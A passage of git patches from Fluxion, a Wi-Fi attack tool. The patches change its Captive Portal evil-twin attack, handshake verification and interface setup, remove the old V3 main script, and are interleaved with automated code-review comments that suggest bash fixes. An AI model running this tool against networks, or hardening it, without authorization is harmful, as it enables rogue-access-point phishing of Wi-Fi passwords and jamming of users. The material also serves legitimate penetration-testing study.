@@ -1308,7 +1308,7 @@ fluxion_hash_set_path() { return ;; "$FLUXIONHashSourceRescanOption") - fluxion_hash_set_path "$hashPath" + fluxion_hash_set_path "$@" return $? ;; "$FLUXIONGeneralBackOption") @@ -1345,9 +1345,10 @@ fluxion_hash_get_path() { if [ ${#@} -lt 2 ]; then return 1; fi while true; do + fluxion_hash_unset_path if ! fluxion_hash_set_path "$@"; then return $?; fi - if fluxion_hash_verify "$FluxionHashPath" "${@:1}"; then + if fluxion_hash_verify "$FluxionHashPath" "$2" "$3"; then break; fi done From f0151e3efcf53f2825d5d52d7268b7e4ae5b7c38 Mon Sep 17 00:00:00 2001 From: Matias Barcenas Date: Wed, 17 Jan 2018 23:18:10 -0600 Subject: [PATCH 20/45] Virtual interface creation & minior bug fixes. The attack will create a virtual interface if using the interface twice. Virtual interface creation & management needs to be moved to main script! Fixed minor bugs caused by outdated sequencing & identifiers. --- attacks/Captive Portal/attack.sh | 36 +++++++++++++++++++++++++++++--- 1 file changed, 33 insertions(+), 3 deletions(-) diff --git a/attacks/Captive Portal/attack.sh b/attacks/Captive Portal/attack.sh index c792ec9..dd109ba 100755 --- a/attacks/Captive Portal/attack.sh +++ b/attacks/Captive Portal/attack.sh @@ -60,6 +60,14 @@ captive_portal_ap_interfaces() { captive_portal_unset_ap_interface() { if [ ! "$CaptivePortalAPInterface" ]; then return 1; fi + if [ "$CaptivePortalAPInterface" = \ + "${CaptivePortalJammerInterface}v" ]; then + if ! iw dev $CaptivePortalAPInterface del \ + &> $FLUXIONOutputDevice; then + fluxion_conditional_bail "Unable to remove virtual interface!" + exit 1 + fi + fi CaptivePortalAPInterface="" } 
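Review bot: fluxion_hash_get_path now passes `"$2"` and `"$3"` to fluxion_hash_verify, but the guard at the top of the function only requires two arguments (`${#@} -lt 2`), so a two-argument call reaches the verifier with an empty third parameter. If the verifier needs both values (its definition is not in this hunk), tighten the guard to `if [ ${#@} -lt 3 ]; then return 1; fi`. Also, `return $?` inside `if ! fluxion_hash_set_path "$@"; then` returns 0, because `$?` there is the status of the negated test; capture the status first, e.g. `fluxion_hash_set_path "$@"; local status=$?` followed by `[ $status -eq 0 ] || return $status`.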
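Review bot: The added `exit 1` after `fluxion_conditional_bail` in captive_portal_unset_ap_interface ends the whole script from inside an unset routine, so the teardown steps that would follow never run on this path; in the unprep_attack shown earlier on this page, the jammer-interface unset comes right after this call. The fluxion_conditional_bail definition visible in the removed fluxion.sh already exits in normal mode and deliberately continues in debug mode; the V4 definition may differ, so confirm, but a non-zero `return` would preserve that behaviour. `$CaptivePortalAPInterface` is also unquoted in `iw dev $CaptivePortalAPInterface del`, as is `$CaptivePortalJammerInterface` in the `iw dev … interface add` call of the next hunk (@@ -75,13 +83,32 @@).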
@@ -75,13 +83,32 @@ captive_portal_set_ap_interface() { echo "Succeeded get ap interface." > $FLUXIONOutputDevice CaptivePortalAPInterface=${FluxionInterfaces[$FluxionInterfaceSelected]} + + # If interfaces are the same, we need an independent virtual interface. + if [ "$CaptivePortalAPInterface" = \ + "$CaptivePortalJammerInterface" ]; then + # TODO: Make fluxion's interface services manage virtual interfaces. + # Have fluxion_get_interface return a virutal interface if the primary + # interface is in used by something else (virtual reservation?). + echo "Virtual interface required, attempting." > $FLUXIONOutputDevice + if ! iw dev $CaptivePortalJammerInterface interface \ + add ${CaptivePortalJammerInterface}v type monitor \ + 2> $FLUXIONOutputDevice; then + echo -e "$FLUXIONVLine $CaptivePortalCannotStartInterfaceError" + sleep 5 + return 2 + fi + echo "Virtual interface created successfully." > $FLUXIONOutputDevice + CaptivePortalAPInterface=${CaptivePortalJammerInterface}v + fi } captive_portal_unset_authenticator() { if [ ! "$CaptivePortalAuthenticatorMode" ]; then return 0; fi case "$CaptivePortalAuthenticatorMode" in - "hash") fluxion_unset_hash ;; + "hash") + echo "Unset hash is done automatically." > $FLUXIONOutputDevice ;; esac CaptivePortalAuthenticatorMode="" @@ -181,6 +208,9 @@ captive_portal_unset_certificate() { if [ ! "$CaptivePortalSSL" ]; then return 1; fi sandbox_remove_workfile "$FLUXIONWorkspacePath/server.pem" CaptivePortalSSL="" + + # Since we're auto-selecting when on auto, trigger undo-chain. + if [ "$FLUXIONAuto" ]; then return 2; fi } # Create Self-Signed SSL Certificate @@ -300,7 +330,7 @@ captive_portal_set_user_interface() { if [ "$CaptivePortalUserInterface" != "" -a \ -d "$FLUXIONPath/attacks/Captive Portal/sites/$CaptivePortalUserInterface.portal" ]; then return 0; fi - captive_portal_unset_portal + captive_portal_unset_user_interface local sites=() 
@@ -351,7 +381,7 @@ captive_portal_set_user_interface() { captive_portal_generic ;; "$FLUXIONGeneralBackOption") - captive_portal_unset_portal + captive_portal_unset_user_interface return 1 ;; *) From 6a5efbdbdd579595adda4f897f42aca533db99dc Mon Sep 17 00:00:00 2001 From: Matias Barcenas Date: Wed, 17 Jan 2018 23:22:03 -0600 Subject: [PATCH 21/45] Added detection support for WPA-TKIP. --- lib/HashUtils.sh | 8 ++++++-- 1 file changed, 6 insertions(+), 2 deletions(-) diff --git a/lib/HashUtils.sh b/lib/HashUtils.sh index bfd9b2a..cb12671 100755 --- a/lib/HashUtils.sh +++ b/lib/HashUtils.sh @@ -11,7 +11,11 @@ function hash_check_handshake() { local -r handshakeAPSSID=$3 local -r handshakeAPMAC=$4 - echo "Verifier Parameters: $handshakeVerifier, path $handshakePath, SSID \"$handshakeAPSSID\", MAC $handshakeAPMAC" > $HashOutputDevice + echo "Verifier Parameters: " > $HashOutputDevice + echo " Verifier: $handshakeVerifier" > $HashOutputDevice + echo "Hash Path: $handshakePath" > $HashOutputDevice + echo "Hash SSID: \"$handshakeAPSSID\"" > $HashOutputDevice + echo " Hash MAC: $handshakeAPMAC" > $HashOutputDevice local analysis # Since it's being used in all relevant instances. @@ -27,7 +31,7 @@ function hash_check_handshake() { if [ "$hashMeta" ]; then local hashID=$(echo "$hashMeta" | awk -F'[ #:]' '{print $3}') - local hashData=$(echo "${analysis[@]}" | awk "\$0~/#$hashID: HMAC_SHA[0-9]+_AES/{ print \$0 }") + local hashData=$(echo "${analysis[@]}" | awk "\$0~/#$hashID: HMAC_(SHA[0-9]+_AES|MD5_RC4)/{ print \$0 }") else echo "No valid hash meta was found for \"$handshakeAPSSID\"" > $HashOutputDevice fi From 9e719e22ea2ed61970c350527fa5695c0e3b6bc1 Mon Sep 17 00:00:00 2001 From: Matias Barcenas Date: Wed, 17 Jan 2018 23:23:22 -0600 Subject: [PATCH 22/45] Removed obsolete interface-selection subroutine. --- lib/InterfaceUtils.sh | 52 +------------------------------------------ 1 file changed, 1 insertion(+), 51 deletions(-) 
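Review bot: The changed awk line in hash_check_handshake builds its program by interpolating `$hashID` into a double-quoted string, so a value parsed out of `$hashMeta` becomes part of the awk source. Pass it as data instead, `awk -v id="$hashID" '$0 ~ ("#" id ": HMAC_(SHA[0-9]+_AES|MD5_RC4)")'`, which also removes the need for the `\$0` escapes. `local hashData=$(…)` on the same line masks the pipeline's exit status; declaring and assigning on separate lines keeps it. hash_check_handshake starts and ends outside this hunk.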
diff --git a/lib/InterfaceUtils.sh b/lib/InterfaceUtils.sh index ab7b2a6..9156c19 100755 --- a/lib/InterfaceUtils.sh +++ b/lib/InterfaceUtils.sh 
@@ -179,54 +179,4 @@ function interface_reidentify() { return $? } -function interface_prompt() { - if [ -z "$1" -o -z "$2" ]; then return 1; fi - - local __interface_prompt__ifAvailable=("${!2}") - local __interface_prompt__ifAvailableInfo=() - local __interface_prompt__ifAvailableColor=() - local __interface_prompt__ifAvailableState=() - - local __interface_prompt__ifCandidate - for __interface_prompt__ifCandidate in "${__interface_prompt__ifAvailable[@]}"; do - interface_chipset "$__interface_prompt__ifCandidate" - __interface_prompt__ifAvailableInfo+=("$InterfaceChipset") - - interface_state "$__interface_prompt__ifCandidate" - - if [ "$InterfaceState" = "up" ]; then - __interface_prompt__ifAvailableColor+=("$CPrp") - __interface_prompt__ifAvailableState+=("[-]") - else - __interface_prompt__ifAvailableColor+=("$CClr") - __interface_prompt__ifAvailableState+=("[+]") - fi - done - - # The following conditional is required since io_query_format_fields - # only considers the the size of the first parameter, available color. - if [ "$6" ]; then # Add alternative choices - __interface_prompt__ifAvailable+=("${!3}") - __interface_prompt__ifAvailableInfo+=("${!4}") - __interface_prompt__ifAvailableState+=("${!5}") - __interface_prompt__ifAvailableColor+=("${!6}") - fi - - # If only one interface exists and it's available, choose it. 
- if [ "${#__interface_prompt__ifAvailable[@]}" -eq 1 -a "${__interface_prompt__ifAvailableState[0]}" = "[+]" ]; then - InterfacePromptWISelected="${__interface_prompt__ifAvailable[0]}" - InterfacePromptWISelectedState="[+]" # It passed the condition, it must be + - InterfacePromptWISelectedInfo="${__interface_prompt__ifAvailableInfo[0]}" - else - format_apply_autosize "$CRed[$CSYel%1d$CClr$CRed]%b %-8b %3s$CClr %-*.*s\n" - io_query_format_fields "$1" "$FormatApplyAutosize" \ - __interface_prompt__ifAvailableColor[@] __interface_prompt__ifAvailable[@] \ - __interface_prompt__ifAvailableState[@] __interface_prompt__ifAvailableInfo[@] - - echo - - InterfacePromptIfSelected="${IOQueryFormatFields[1]}" - InterfacePromptIfSelectedState="${IOQueryFormatFields[2]}" - InterfacePromptWISelectedInfo="${IOQueryFormatFields[3]}" - fi -} +# FLUXSCRIPT END From c66d11feb39a89cdb43b033f5c50230157986c83 Mon Sep 17 00:00:00 2001 From: Matias Barcenas Date: Wed, 17 Jan 2018 23:25:53 -0600 Subject: [PATCH 23/45] Removed Fluxion V3. --- fluxion.sh | 1025 ---------------------------------------------------- 1 file changed, 1025 deletions(-) delete mode 100755 fluxion.sh diff --git a/fluxion.sh b/fluxion.sh deleted file mode 100755 index dc73f09..0000000 --- a/fluxion.sh +++ /dev/null 
@@ -1,1025 +0,0 @@ -#!/bin/bash - -################################ < FLUXION Parameters > ################################ -# NOTE: The FLUXIONPath constant will not be populated correctly if the script is called -# directly via a symlink. Symlinks in the path to the script should work completely fine. -declare -r FLUXIONPath="$(cd "$(dirname "$0")" ;pwd -P -)" - -declare -r FLUXIONWorkspacePath="/tmp/fluxspace" -declare -r FLUXIONHashPath="$FLUXIONPath/attacks/Handshake Snooper/handshakes" -declare -r FLUXIONScanDB="dump" - -declare -r FLUXIONNoiseFloor=-90 -declare -r FLUXIONNoiseCeiling=-60 - -declare -r FLUXIONVersion=3 -declare -r FLUXIONRevision=11 - -declare -r FLUXIONDebug=${FLUXIONDebug:+1} -declare -r FLUXIONWIKillProcesses=${FLUXIONWIKillProcesses:+1} -declare -r FLUXIONWIReloadDriver=${FLUXIONWIReloadDriver:+1} -declare -r FLUXIONAuto=${FLUXIONAuto:+1} - -# FLUXIONDebug [Normal Mode "" / Developer Mode 1] -declare -r FLUXIONOutputDevice=$([ $FLUXIONDebug ] && echo "/dev/stdout" || echo "/dev/null") - -declare -r FLUXIONHoldXterm=$([ $FLUXIONDebug ] && echo "-hold" || echo "") - -################################# < Library Includes > ################################# -source lib/installer/InstallerUtils.sh -source lib/InterfaceUtils.sh -source lib/SandboxUtils.sh -source lib/FormatUtils.sh -source lib/ColorUtils.sh -source lib/IOUtils.sh -source lib/HashUtils.sh - -################################ < FLUXION Parameters > ################################ -FLUXIONPrompt="$CRed[${CSBlu}fluxion$CSYel@$CSWht$HOSTNAME$CClr$CRed]-[$CSYel~$CClr$CRed]$CClr " -FLUXIONVLine="$CRed[$CSYel*$CClr$CRed]$CClr" - -################################ < Library Parameters > ################################ -InterfaceUtilsOutputDevice="$FLUXIONOutputDevice" - -SandboxWorkspacePath="$FLUXIONWorkspacePath" -SandboxOutputDevice="$FLUXIONOutputDevice" - -InstallerUtilsWorkspacePath="$FLUXIONWorkspacePath" -InstallerUtilsOutputDevice="$FLUXIONOutputDevice" 
-InstallerUtilsNoticeMark="$FLUXIONVLine" - -PackageManagerLog="$InstallerUtilsWorkspacePath/package_manager.log" - -IOUtilsHeader="fluxion_header" -IOUtilsQueryMark="$FLUXIONVLine" -IOUtilsPrompt="$FLUXIONPrompt" - -HashOutputDevice="$FLUXIONOutputDevice" - -################################# < Super User Check > ################################# -if [ $EUID -ne 0 ]; then - echo -e "${CRed}You don't have admin privilegies, execute the script as root.$CClr" - exit 1 -fi - -################################### < XTerm Checks > ################################### -if [ ! "${DISPLAY:-}" ]; then - echo -e "${CRed}The script should be exected inside a X (graphical) session.$CClr" - exit 2 -fi - -if ! hash xdpyinfo 2>/dev/null; then - echo -e "${CRed}xdpyinfo not installed, please install the relevant package for your distribution.$CClr" - exit 3 -fi - -if ! xdpyinfo &>/dev/null; then - echo -e "${CRed}The script failed to initialize an xterm test session.$CClr" - exit 3 -fi - -################################# < Default Language > ################################# -source language/en.sh - -################################# < User Preferences > ################################# -if [ -x "$FLUXIONPath/preferences.sh" ]; then source "$FLUXIONPath/preferences.sh"; fi - -######################################################################################## -function fluxion_exitmode() { - if [ $FLUXIONDebug ]; then return 1; fi - - fluxion_header - - echo -e "$CWht[$CRed-$CWht]$CRed $FLUXIONCleanupAndClosingNotice$CClr" - - # List currently running processes which we might have to kill before exiting. - local processes - readarray processes < <(ps -A) - - # Currently, fluxion is only responsible for killing airodump-ng, because - # fluxion explicitly it uses it to scan for candidate target access points. - # NOTICE: Processes started by subscripts, such as an attack script, - # MUST BE TERMINATED BY THAT SAME SCRIPT in the subscript's abort handler. 
- local targets=("airodump-ng") - - local targetID # Program identifier/title - for targetID in "${targets[@]}"; do - # Get PIDs of all programs matching targetPID - local targetPID=$(echo "${processes[@]}" | awk '$4~/'"$targetID"'/{print $1}') - if [ ! "$targetPID" ]; then continue; fi - echo -e "$CWht[$CRed-$CWht] $(io_dynamic_output $FLUXIONKillingProcessNotice)" - killall $targetPID &>$FLUXIONOutputDevice - done - - # If the installer activated the package manager, make sure to undo any changes. - if [ "$PackageManagerCLT" ]; then - echo -e "$CWht[$CRed-$CWht] "$(io_dynamic_output "$FLUXIONRestoringPackageManagerNotice")"$CClr" - unprep_package_manager - fi - - if [ "$WIMonitor" ]; then - echo -e "$CWht[$CRed-$CWht] $FLUXIONDisablingMonitorNotice$CGrn $WIMonitor$CClr" - if [ "$FLUXIONAirmonNG" ]; then airmon-ng stop "$WIMonitor" &>$FLUXIONOutputDevice - else interface_set_mode "$WIMonitor" "managed" - fi - fi - - echo -e "$CWht[$CRed-$CWht] $FLUXIONRestoringTputNotice$CClr" - tput cnorm - - if [ ! $FLUXIONDebug ]; then - echo -e "$CWht[$CRed-$CWht] $FLUXIONDeletingFilesNotice$CClr" - sandbox_remove_workfile "$FLUXIONWorkspacePath/*" - fi - - if [ $FLUXIONWIKillProcesses ]; then - echo -e "$CWht[$CRed-$CWht] $FLUXIONRestartingNetworkManagerNotice$CClr" - - # systemctl check - systemd=$(whereis systemctl) - if [ "$systemd" = "" ]; then - service network-manager restart &>$FLUXIONOutputDevice & - service networkmanager restart &>$FLUXIONOutputDevice & - service networking restart &>$FLUXIONOutputDevice & - else - systemctl restart NetworkManager &>$FLUXIONOutputDevice & - fi - fi - - echo -e "$CWht[$CGrn+$CWht] $CGrn$FLUXIONCleanupSuccessNotice$CClr" - echo -e "$CWht[$CGrn+$CWht] $CGry$FLUXIONThanksSupportersNotice$CClr" - - sleep 3 - - clear - - exit 0 -} - -# Delete log only in Normal Mode ! -function fluxion_conditional_clear() { - # Clear iff we're not in debug mode - if [ ! 
$FLUXIONDebug ]; then clear; fi -} - -function fluxion_conditional_bail() { - echo ${1:-"Something went wrong, whoops! (report this)"} - sleep 5 - if [ ! $FLUXIONDebug ]; then - fluxion_handle_exit - return 1 - fi - echo "Press any key to continue execution..." - read bullshit -} - -# ERROR Report only in Developer Mode -function fluxion_error_report() { - echo "Error on line $1" -} - -if [ "$FLUXIONDebug" ]; then - trap 'fluxion_error_report $LINENUM' ERR -fi - -function fluxion_handle_abort_attack() { - if [ $(type -t stop_attack) ]; then - stop_attack &>$FLUXIONOutputDevice - unprep_attack &>$FLUXIONOutputDevice - else - echo "Attack undefined, can't stop anything..." >$FLUXIONOutputDevice - fi -} - -# In case an abort signal is received, -# abort any attacks currently running. -trap fluxion_handle_abort_attack SIGABRT - -function fluxion_handle_exit() { - fluxion_handle_abort_attack - fluxion_exitmode - exit 1 -} - -# In case of unexpected termination, run fluxion_exitmode -# to execute cleanup and reset commands. -trap fluxion_handle_exit SIGINT SIGHUP - -function fluxion_header() { - format_apply_autosize "[%*s]\n" - local verticalBorder=$FormatApplyAutosize - - format_apply_autosize "[%*s${CSRed}FLUXION $FLUXIONVersion${CSWht}.${CSBlu}$FLUXIONRevision$CSRed <$CIRed F${CIYel}luxion$CIRed I${CIYel}s$CIRed T${CIYel}he$CIRed F${CIYel}uture$CClr$CSYel >%*s$CSBlu]\n" - local headerTextFormat="$FormatApplyAutosize" - - fluxion_conditional_clear - - echo -e "$(printf "$CSRed$verticalBorder" "" | sed -r "s/ /~/g")" - printf "$CSRed$verticalBorder" "" - printf "$headerTextFormat" "" "" - printf "$CSBlu$verticalBorder" "" - echo -e "$(printf "$CSBlu$verticalBorder" "" | sed -r "s/ /~/g")$CClr" - echo - echo -} - -# Create working directory -if [ ! -d "$FLUXIONWorkspacePath" ]; then - mkdir -p "$FLUXIONWorkspacePath" &>$FLUXIONOutputDevice -fi - -####################################### < Start > ###################################### -if [ ! 
$FLUXIONDebug ]; then - FLUXIONBanner=() - - format_center_literals " ⌠▓▒▓▒ ⌠▓╗ ⌠█┐ ┌█ ┌▓\ /▓┐ ⌠▓╖ ⌠◙▒▓▒◙ ⌠█\ ☒┐" - FLUXIONBanner+=("$FormatCenterLiterals") - format_center_literals " ║▒_ │▒║ │▒║ ║▒ \▒\/▒/ │☢╫ │▒┌╤┐▒ ║▓▒\ ▓║" - FLUXIONBanner+=("$FormatCenterLiterals") - format_center_literals " ≡◙◙ ║◙║ ║◙║ ║◙ ◙◙ ║¤▒ ║▓║☯║▓ ♜◙\✪\◙♜" - FLUXIONBanner+=("$FormatCenterLiterals") - format_center_literals " ║▒ │▒║__ │▒└_┘▒ /▒/\▒\ │☢╫ │▒└╧┘▒ ║█ \▒█║" - FLUXIONBanner+=("$FormatCenterLiterals") - format_center_literals " ⌡▓ ⌡◘▒▓▒ ⌡◘▒▓▒◘ └▓/ \▓┘ ⌡▓╝ ⌡◙▒▓▒◙ ⌡▓ \▓┘" - FLUXIONBanner+=("$FormatCenterLiterals") - format_center_literals "¯¯¯ ¯¯¯¯¯¯ ¯¯¯¯¯¯¯ ¯¯¯ ¯¯¯ ¯¯¯¯ ¯¯¯¯¯¯¯ ¯¯¯¯¯¯¯¯" - FLUXIONBanner+=("$FormatCenterLiterals") - - clear - - if [ "$FLUXIONAuto" ]; then echo -e "$CBlu" - else echo -e "$CRed" - fi - - for line in "${FLUXIONBanner[@]}"; do - echo "$line" - sleep 0.05 - done - #echo "${FLUXIONBanner[@]}" - echo - - sleep 0.1 - format_center_literals "${CGrn}Site: ${CRed}https://github.com/FluxionNetwork/fluxion$CClr" - echo -e "$FormatCenterLiterals" - - sleep 0.1 - format_center_literals "${CSRed}FLUXION $FLUXIONVersion$CClr (rev. $CSBlu$FLUXIONRevision$CClr)$CYel by$CWht ghost" - echo -e "$FormatCenterLiterals" - - sleep 0.1 - if installer_utils_check_update "https://raw.githubusercontent.com/FluxionNetwork/fluxion/master/fluxion.sh" "FLUXIONVersion=" "FLUXIONRevision=" $FLUXIONVersion $FLUXIONRevision; then installer_utils_run_update "https://github.com/FluxionNetwork/fluxion/archive/master.zip" "FLUXION-V$FLUXIONVersion.$FLUXIONRevision" "$(dirname "$FLUXIONPath")" - fi - - echo - - FLUXIONCLIToolsRequired=("aircrack-ng" "python2:python2.7|python2" "bc" "awk:awk|gawk|mawk" "curl" "dhcpd:isc-dhcp-server|dhcp" "7zr:p7zip" "hostapd" "lighttpd" "iwconfig:wireless-tools" "macchanger" "mdk3" "nmap" "openssl" "php-cgi" "pyrit" "xterm" "rfkill" "unzip" "route:net-tools" "fuser:psmisc" "killall:psmisc") - FLUXIONCLIToolsMissing=() - - while ! 
installer_utils_check_dependencies FLUXIONCLIToolsRequired[@]; do installer_utils_run_dependencies InstallerUtilsCheckDependencies[@] - done -fi - -#################################### < Resolution > #################################### -function fluxion_set_resolution() { # Windows + Resolution - # Calc options - RATIO=4 - - # Get demensions - SCREEN_SIZE=$(xdpyinfo | grep dimension | awk '{print $4}' | tr -d "(") - SCREEN_SIZE_X=$(printf '%.*f\n' 0 $(echo $SCREEN_SIZE | sed -e s'/x/ /'g | awk '{print $1}')) - SCREEN_SIZE_Y=$(printf '%.*f\n' 0 $(echo $SCREEN_SIZE | sed -e s'/x/ /'g | awk '{print $2}')) - - PROPOTION=$(echo $(awk "BEGIN {print $SCREEN_SIZE_X/$SCREEN_SIZE_Y}")/1 | bc) - NEW_SCREEN_SIZE_X=$(echo $(awk "BEGIN {print $SCREEN_SIZE_X/$RATIO}")/1 | bc) - NEW_SCREEN_SIZE_Y=$(echo $(awk "BEGIN {print $SCREEN_SIZE_Y/$RATIO}")/1 | bc) - - NEW_SCREEN_SIZE_BIG_X=$(echo $(awk "BEGIN {print 1.5*$SCREEN_SIZE_X/$RATIO}")/1 | bc) - NEW_SCREEN_SIZE_BIG_Y=$(echo $(awk "BEGIN {print 1.5*$SCREEN_SIZE_Y/$RATIO}")/1 | bc) - - SCREEN_SIZE_MID_X=$(echo $(($SCREEN_SIZE_X + ($SCREEN_SIZE_X - 2 * $NEW_SCREEN_SIZE_X) / 2))) - SCREEN_SIZE_MID_Y=$(echo $(($SCREEN_SIZE_Y + ($SCREEN_SIZE_Y - 2 * $NEW_SCREEN_SIZE_Y) / 2))) - - # Upper - TOPLEFT="-geometry $NEW_SCREEN_SIZE_Xx$NEW_SCREEN_SIZE_Y+0+0" - TOPRIGHT="-geometry $NEW_SCREEN_SIZE_Xx$NEW_SCREEN_SIZE_Y-0+0" - TOP="-geometry $NEW_SCREEN_SIZE_Xx$NEW_SCREEN_SIZE_Y+$SCREEN_SIZE_MID_X+0" - - # Lower - BOTTOMLEFT="-geometry $NEW_SCREEN_SIZE_Xx$NEW_SCREEN_SIZE_Y+0-0" - BOTTOMRIGHT="-geometry $NEW_SCREEN_SIZE_Xx$NEW_SCREEN_SIZE_Y-0-0" - BOTTOM="-geometry $NEW_SCREEN_SIZE_Xx$NEW_SCREEN_SIZE_Y+$SCREEN_SIZE_MID_X-0" - - # Y mid - LEFT="-geometry $NEW_SCREEN_SIZE_Xx$NEW_SCREEN_SIZE_Y+0-$SCREEN_SIZE_MID_Y" - RIGHT="-geometry $NEW_SCREEN_SIZE_Xx$NEW_SCREEN_SIZE_Y-0+$SCREEN_SIZE_MID_Y" - - # Big - TOPLEFTBIG="-geometry $NEW_SCREEN_SIZE_BIG_Xx$NEW_SCREEN_SIZE_BIG_Y+0+0" - TOPRIGHTBIG="-geometry $NEW_SCREEN_SIZE_BIG_Xx$NEW_SCREEN_SIZE_BIG_Y-0+0" 
-} - -##################################### < Language > ##################################### -function fluxion_set_language() { - if [ "$FLUXIONAuto" ]; then - FLUXIONLanguage="en" - else - # Get all languages available. - local languageCodes - readarray -t languageCodes < <(ls -1 language | sed -E 's/\.sh//') - - local languages - readarray -t languages < <(head -n 3 language/*.sh | grep -E "^# native: " | sed -E 's/# \w+: //') - - io_query_format_fields "$FLUXIONVLine Select your language" "\t$CRed[$CSYel%d$CClr$CRed]$CClr %s / %s\n" languageCodes[@] languages[@] - - FLUXIONLanguage=${IOQueryFormatFields[0]} - - echo # Leave this spacer. - - # Check if all language files are present for the selected language. - find -type d -name language | while read language_dir; do - if [ ! -e "$language_dir/${FLUXIONLanguage}.sh" ]; then - echo -e "$FLUXIONVLine ${CYel}Warning${CClr}, missing language file:" - echo -e "\t$language_dir/${FLUXIONLanguage}.sh" - return 1 - fi - done - - # If a file is missing, fall back to english. - if [ $? -eq 1 ]; then - echo -e "\n\n$FLUXIONVLine Falling back to English..." - sleep 5 - FLUXIONLanguage="en" - return 1 - fi - - source "$FLUXIONPath/language/$FLUXIONLanguage.sh" - fi -} - -#################################### < Interfaces > #################################### -function fluxion_unset_interface() { - # Unblock interfaces to make them available. - echo -e "$FLUXIONVLine $FLUXIONUnblockingWINotice" - rfkill unblock all &>$FLUXIONOutputDevice - - # Find all monitor-mode interfaces & all AP interfaces. - echo -e "$FLUXIONVLine $FLUXIONFindingExtraWINotice" - local wiMonitors=($(iwconfig 2>&1 | grep "Mode:Monitor" | awk '{print $1}')) - - # Remove all monitor-mode & all AP interfaces. - echo -e "$FLUXIONVLine $FLUXIONRemovingExtraWINotice" - if [ ${#wiMonitors[@]} -gt 0 ]; then - local monitor - for monitor in ${wiMonitors[@]}; do - # Remove any previously created fluxion AP interfaces. 
- #iw dev "FX${monitor:2}AP" del &> $FLUXIONOutputDevice - - # Remove monitoring interface after AP interface. - if [[ "$monitor" == *"mon" ]]; then airmon-ng stop "$monitor" >$FLUXIONOutputDevice - else interface_set_mode "$monitor" "managed" - fi - - if [ $FLUXIONDebug ]; then - echo -e "Stopped $monitor." - fi - done - fi - - WIMonitor="" -} - -# Choose Interface -function fluxion_set_interface() { - if [ "$WIMonitor" ]; then return 0; fi - - fluxion_unset_interface - - # Gather candidate interfaces. - echo -e "$FLUXIONVLine $FLUXIONFindingWINotice" - - # List of all available wireless network interfaces. - # These will be stored in our array right below. - interface_list_wireless - - local wiAlternate=("$FLUXIONGeneralRepeatOption") - local wiAlternateInfo=("") - local wiAlternateState=("") - local wiAlternateColor=("$CClr") - - interface_prompt "$FLUXIONVLine $FLUXIONInterfaceQuery" InterfaceListWireless[@] \ - wiAlternate[@] wiAlternateInfo[@] wiAlternateState[@] wiAlternateColor[@] - - local wiSelected=$InterfacePromptIfSelected - - if [ "$wiSelected" = "$FLUXIONGeneralRepeatOption" ]; then - fluxion_unset_interface - return 1 - fi - - if [ ! "$FLUXIONWIKillProcesses" -a "$InterfacePromptIfSelectedState" = "[-]" ]; then - echo -e "$FLUXIONVLine $FLUXIONSelectedBusyWIError" - echo -e "$FLUXIONVLine $FLUXIONSelectedBusyWITip" - sleep 7 - fluxion_unset_interface - return 1 - fi - - if ! fluxion_run_interface "$wiSelected"; then return 1 - fi - - WIMonitor="$FluxionRunInterface" -} - -function fluxion_run_interface() { - if [ ! "$1" ]; then return 1; fi - - local ifSelected="$1" - - if [ "$FLUXIONWIReloadDriver" ]; then - # Get selected interface's driver details/info-descriptor. - echo -e "$FLUXIONVLine $FLUXIONGatheringWIInfoNotice" - - if ! interface_driver "$ifSelected"; then - echo -e "$FLUXIONVLine$CRed $FLUXIONUnknownWIDriverError" - sleep 3 - return 1 - fi - - local ifDriver="$InterfaceDriver" - - # I'm not really sure about this conditional here. 
- # FLUXION 2 had the conditional so I kept it there. - if [ ! "$(echo $ifDriver | egrep 'rt2800|rt73')" ]; then - rmmod -f $ifDriver &>$FLUXIONOutputDevice 2>&1 - - # Wait while interface becomes unavailable. - echo -e "$FLUXIONVLine $(io_dynamic_output $FLUXIONUnloadingWIDriverNotice)" - while interface_physical "$ifSelected"; do sleep 1 - done - fi - fi - - if [ "$FLUXIONWIKillProcesses" ]; then - # Get list of potentially troublesome programs. - echo -e "$FLUXIONVLine $FLUXIONFindingConflictingProcessesNotice" - # This shit has to go reeeeeal soon (airmon-ng)... - local conflictPrograms=($(airmon-ng check | awk 'NR>6{print $2}')) - - # Kill potentially troublesome programs. - echo -e "$FLUXIONVLine $FLUXIONKillingConflictingProcessesNotice" - for program in "${conflictPrograms[@]}"; do killall "$program" &>$FLUXIONOutputDevice - done - fi - - if [ "$FLUXIONWIReloadDriver" ]; then - # I'm not really sure about this conditional here. - # FLUXION 2 had the conditional so I kept it there. - if [ ! "$(echo $ifDriver | egrep 'rt2800|rt73')" ]; then modprobe "$ifDriver" &>$FLUXIONOutputDevice 2>&1 - fi - - # Wait while interface becomes available. - echo -e "$FLUXIONVLine $(io_dynamic_output $FLUXIONLoadingWIDriverNotice)" - while ! interface_physical "$ifSelected"; do sleep 1 - done - fi - - # Activate wireless interface monitor mode and save identifier. - echo -e "$FLUXIONVLine $FLUXIONStartingWIMonitorNotice" - if [ "$FLUXIONAirmonNG" ]; then - # TODO: Need to check weather switching to monitor mode below failed. - # Notice: Line below could cause issues with different airmon versions. 
- FluxionRunInterface=$(airmon-ng start $ifSelected | awk -F'\[phy[0-9]+\]|\)' '$0~/monitor .* enabled/{print $3}' 2>/dev/null) - else - if interface_set_mode "$ifSelected" "monitor"; then FluxionRunInterface=$ifSelected - else FluxionRunInterface="" - fi - fi - - if [ "$FluxionRunInterface" ]; then - echo -e "$FLUXIONVLine $FLUXIONMonitorModeWIEnabledNotice" - sleep 3 - else - echo -e "$FLUXIONVLine $FLUXIONMonitorModeWIFailedError" - sleep 3 - return 2 - fi -} - -###################################### < Scanner > ##################################### -function fluxion_set_scanner() { - # If scanner's already been set and globals are ready, we'll skip setup. - if [ "$APTargetSSID" -a "$APTargetChannel" -a "$APTargetEncryption" -a \ - "$APTargetMAC" -a "$APTargetMakerID" -a "$APRogueMAC" ]; then - return 0 - fi - - if [ "$FLUXIONAuto" ]; then - fluxion_run_scanner $WIMonitor - else - local choices=("$FLUXIONScannerChannelOptionAll (2.4GHz)" "$FLUXIONScannerChannelOptionAll (5GHz)" "$FLUXIONScannerChannelOptionAll (2.4GHz & 5Ghz)" "$FLUXIONScannerChannelOptionSpecific" "$FLUXIONGeneralBackOption") - io_query_choice "$FLUXIONScannerChannelQuery" choices[@] - - echo - - case "$IOQueryChoice" in - "$FLUXIONScannerChannelOptionAll (2.4GHz)") fluxion_run_scanner $WIMonitor "" "bg" ;; - "$FLUXIONScannerChannelOptionAll (5GHz)") fluxion_run_scanner $WIMonitor "" "a" ;; - 